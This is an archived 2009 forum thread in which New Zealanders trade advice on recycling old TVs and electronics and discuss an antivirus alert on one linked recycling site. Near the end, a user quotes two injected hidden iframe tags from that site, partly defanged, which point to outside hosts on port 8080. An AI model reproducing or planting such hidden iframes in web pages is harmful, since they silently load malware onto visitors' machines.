PDA

View Full Version : Disposing of old electronic equipment

redgorilla
11-08-2009, 04:47 PM
Being forced to keep house for the first time, I have things to figure out - like what to do with electronic equipment when it dies.

I have two TVs (one extremely heavy) and two mini systems suffering various degrees of brokenness, and would like to know how to dispose of them.

Do you take it to the refuse transfer station and chuck it in the pit, or are there people who make use of things like this? I'm on the North Shore.

Thanks.

somebody
11-08-2009, 04:51 PM
Electronic goods should be disposed of safely, as they (especially old TVs) contain mercury and other dangerous chemicals. Give your city council a ring, and find out where you can dispose of these goods - they may have a collection facility that operates near, or in, the transfer station.

seltsam
11-08-2009, 06:02 PM
http://www.crtnz.co.nz/

PaulD
11-08-2009, 06:44 PM

Avast blocks that page loading "HTML:Iframe-inf" virus.

Safari
11-08-2009, 09:48 PM

That is fine if you are in Auckland. Most other places there is no option but to take old TVs to the land fill.

For computer computer equipment eDay is coming up again next month.
http://www.eday.org.nz/

Laura
11-08-2009, 11:14 PM
Avast blocks that page loading "HTML:Iframe-inf" virus.

My avast (free) doesn't block it. Should I be worried?

bob_doe_nz
11-08-2009, 11:43 PM
EDay will not take TV's

Sweep
12-08-2009, 02:24 AM

Hey Laura,
I run Avast Free and when I clicked on the link above it was blocked.

I aborted the connection.

Very often I will not click on a link for this very reason. It is also why when I post a link I will post the the whole link.

Misty
12-08-2009, 05:43 AM
My free edition of Avast blocked it too !
Misty :2cents:

Misty
12-08-2009, 05:49 AM
Hi redgorilla
We live on the North Shore. Had a printer we wanted to get rid of. For some reason Mrs Misty knew that we could take it to Noel Leeming for disposal (Just off Link Drive was the one we drove to) . Sure enough they took it even though not bought from them. Maybe they will take televisions too ?
Misty :)

gary67
12-08-2009, 07:41 AM
My Nod 32 didn't block it it opened fine could be a false positive with Avast

seltsam
12-08-2009, 11:36 AM
My free Avast doesn't blink at the site I posted

Marnie
12-08-2009, 12:06 PM
My free avast told me it had detected a virus, also. False positive, or not, I wasn't going to go any further.
The advice given to phone your local council is good advice. Ours told us where to go, in a manner of speaking :D .

SurferJoe46
12-08-2009, 12:10 PM
I never have troubles disposing of used electronic and computer devices. I just put them on top of my Isuzu and drive to Beaumont and just let what happens - happen.

Laura
12-08-2009, 02:40 PM
Hmmm

You guys have me wondering about my avast free now.
Why isn't it blocking something it's blocking with yours - even if it might be a false positive?

My status is Active.
My Resident Protection is High.
Putting curser over the tray symbol shows 7 provider(s) 6 running

Guess I have to find out what the missing no. 7 is? I can't remember what I accepted originally - so long ago.

FoxyMX
12-08-2009, 06:55 PM
Putting curser over the tray symbol shows 7 provider(s) 6 running

Guess I have to find out what the missing no. 7 is? I can't remember what I accepted originally - so long ago.

No idea why your Avast did not try to block that website (mine did) but the "missing" provider could be your email client. Right-click on the Avast icon in the Task Tray and compare the lists under the "Pause Provider" and "Stop Provider" to see which is not running.

Laura
12-08-2009, 09:23 PM
No idea why your Avast did not try to block that website (mine did) but the "missing" provider could be your email client. Right-click on the Avast icon in the Task Tray and compare the lists under the "Pause Provider" and "Stop Provider" to see which is not running.

Aha, Foxy

The Pause list has 6 items.
The Stop list has 7.

The extra one is Outlook/Exchange.

Where to from here to fix, please?

Edit: My email is Outlook Express - if that matters...

FoxyMX
12-08-2009, 10:37 PM
Did you have Outlook Express running when you checked which providers were running? If not, try that and see if it starts then.

Edit: I just opened OE and mine didn't start. Can't see any option to start it either, but it scans my Eudora mail so I'm not too concerned.

If you are worried then I would suggest starting a new thread on this topic to see if others have any advice.

Misty
12-08-2009, 10:38 PM
Courtesy of Mrs Misty --

http://www.computerrecycling.co.nz/?gclid=CMPt2-7onZwCFcEtpAodH00jeg

Misty :D

Laura
12-08-2009, 11:44 PM
Did you have Outlook Express running when you checked which providers were running? If not, try that and see if it starts then.

Edit: I just opened OE and mine didn't start. Can't see any option to start it either, but it scans my Eudora mail so I'm not too concerned.

If you are worried then I would suggest starting a new thread on this topic to see if others have any advice.

Yes, Outlook Express was running, I checked again to be sure.
I've been assuming my email's being checked. Maybe I'm wrong - or maybe I've downloaded something else that's doing the business there instead. My brain is having a tired night, so I'm chickening out on any further search right now..

BUT - One mystification - can't see why avast's email functions have anything to do with its performance when opening a link to a recycling website.
That link's what started my query, after all...

PaulD
13-08-2009, 12:53 AM
When you go to crtnz the following links are included my "*"
iframe src="h**p://b5z.at:8080/index.php" width=136 height=153 style="visibility: hidden"
iframe src="h**p://mbdc.in:8080/index.php" width=178 height=184

Maybe Edit Very Probably this is what Avast is blocking.

redgorilla
13-08-2009, 01:53 AM
http://www.computerrecycling.co.nz/?gclid=CMPt2-7onZwCFcEtpAodH00jeg

Good one, I like that word 'free'. Thanks Misty and others.

I also found www.rcn.co.nz, which specifically mentions old TVs but does charge.
Seems like there's a whole industry behind it!